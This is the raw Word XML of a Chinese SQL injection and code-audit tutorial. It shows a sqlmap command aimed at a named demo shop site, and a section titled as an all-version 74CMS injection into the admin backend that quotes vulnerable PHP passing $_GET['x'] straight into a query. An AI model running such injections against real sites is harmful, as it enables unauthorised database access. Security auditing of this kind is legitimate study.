          <v:shape id="_x0000_s10083" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:37.25pt;width:319.25pt;height:54.05pt;z-index:172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7" w:lineRule="exact"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>sqlmap</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> git:(master) </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho" w:hAnsi="MS Mincho"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>✗</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho" w:hAnsi="MS Mincho"/>
                      <w:spacing w:val="-63"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>python sqlmap.py -u</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:hyperlink r:id="rId24">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:w w:val="95"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>"http://demo2.tp-shop.cn/index.php?m=Home&amp;c=Api&amp;a=get</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>Region&amp;parent_id=2" -p parent_id -v 3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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这里存在注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> demo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入：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0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="852"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="2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1744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-2639120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5195189" cy="2404872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189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sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>其实我来总结一下，代码审计首先你得看得懂代码。可能你学完</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="1839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基础之后还是对有些程序看不懂，其实已经利用了框架开发，所以这</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="361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417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="74CMS_人才系统注入全版本通杀进后台"/>
      <w:bookmarkStart w:id="24" w:name="_bookmark11"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>时候你要开始学习框架，等学完了你再来看这套程序的时候。你就会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突然明白很多。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28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Angsana New" w:eastAsia="Angsana New"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">74CMS  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>人才系统注入全版本通杀进后台</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="26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作者：小屁孩</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="417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整套程序过滤的还是比较全面的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不过所有版本都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> GBK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编码是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他的硬伤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但是基本上字符串入库的时候作者都使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> iconv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-23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来把提交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过来的数据编码转换成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-22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utf8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="17" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="415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所以利用宽字符注入就没办法了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但是过滤完善仅限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>版本之前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最新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-2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3.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-22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版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-2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plu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-23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目录多了几个文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="37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不知道是不是换了程序员了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>先上两个白痴注入吧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\plus\ajax_officebuilding.php line</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:16</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda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Vrinda"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
        </w:rPr>
        <w:pict>
          <v:group id="_x0000_s10049" style="width:319.25pt;height:456.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6385,9128">
            <v:rect id="_x0000_s10082" style="position:absolute;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10081" style="position:absolute;top:326;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10080" style="position:absolute;top:652;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10079" style="position:absolute;top:978;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10078" style="position:absolute;top:1304;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10077" style="position:absolute;top:1630;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10076" style="position:absolute;top:1956;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10075" style="position:absolute;top:2282;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10074" style="position:absolute;top:2608;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10073" style="position:absolute;top:2934;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10072" style="position:absolute;top:3260;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10071" style="position:absolute;top:3586;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10070" style="position:absolute;top:3912;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10069" style="position:absolute;top:4238;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10068" style="position:absolute;top:4564;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10067" style="position:absolute;top:4890;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10066" style="position:absolute;top:5216;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10065" style="position:absolute;top:5542;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10064" style="position:absolute;top:5868;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10063" style="position:absolute;top:6194;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10062" style="position:absolute;top:6520;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10061" style="position:absolute;top:6846;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10060" style="position:absolute;top:7172;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10059" style="position:absolute;top:7498;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10058" style="position:absolute;top:7824;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10057" style="position:absolute;top:8150;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10056" style="position:absolute;top:8476;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10055" style="position:absolute;top:8802;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:shape id="_x0000_s10054" type="#_x0000_t202" style="position:absolute;left:1;top:92;width:5277;height:3766" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="198" w:lineRule="exact"/>
                      <w:ind w:right="2282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if(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$act == 'alphabet')</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="7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3" w:line="307" w:lineRule="auto"/>
                      <w:ind w:left="720" w:right="2282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$alphabet=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trim(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$_GET['x']); if (!empty($alphabet))</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="4"/>
                      <w:ind w:left="720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3" w:line="309" w:lineRule="auto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$result = $db-&gt;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query(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"select * from ".table(</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>'category')."</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda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rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>where c_alias='QS_officebuilding' AND c_index='{$alphabet}'</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda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rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>");</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="2"/>
                      <w:ind w:left="720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while(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$row = $db-&gt;fetch_array($result))</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="720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1"/>
                      <w:ind w:left="1440" w:right="2282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if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 xml:space="preserve"> ($listtype=="li")</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="1440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3" w:line="235" w:lineRule="exact"/>
                      <w:ind w:left="1440" w:right="2282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$htm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.=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"</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s10053" type="#_x0000_t202" style="position:absolute;left:1;top:3986;width:83;height:1810" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="187" w:lineRule="exact"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
                        <w:w w:val="99"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t></w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="144" w:line="213" w:lineRule="exact"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
                        <w:w w:val="99"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t></w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s10052" type="#_x0000_t202" style="position:absolute;left:262;top:4004;width:3566;height:4745" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="198" w:lineRule="exact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{$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row[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'c_name']}";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="117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3"/>
                      <w:ind w:left="1178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else</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="71"/>
                      <w:ind w:left="117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73"/>
                      <w:ind w:left="117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$htm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.=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"</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73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{$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row[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'c_name']}{$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row[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'stat_jobs']}";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="117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3"/>
                      <w:ind w:left="45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3"/>
                      <w:ind w:left="458"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>if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 xml:space="preserve"> (empty($htm))</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="71"/>
                      <w:ind w:left="45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{</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="47"/>
                      <w:ind w:left="458"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:spacing w:val="-1"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>$htm="</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                        <w:spacing w:val="-1"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>没有找到首字母为</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                        <w:spacing w:val="-1"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>：</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:spacing w:val="-1"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>{</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:spacing w:val="-1"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>$alphabet}</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="45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  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                      <w:ind w:left="458" w:right="2155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sz w:val="18"/>
                      </w:rPr>
                      <w:t>$htm</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>.=</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>""; exit($htm);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="2" w:line="235" w:lineRule="exact"/>
                      <w:ind w:left="458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</w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s10051" type="#_x0000_t202" style="position:absolute;left:4011;top:7239;width:1048;height:205" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="205" w:lineRule="exact"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrind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8"/>
                      </w:rPr>
                      <w:t>的写字楼！</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                        <w:w w:val="95"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>";</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s10050" type="#_x0000_t202" style="position:absolute;left:1;top:8893;width:103;height:180" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="180" w:lineRule="exact"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:w w:val="99"/>
                        <w:sz w:val="18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8"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="44" w:line="285" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'x']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
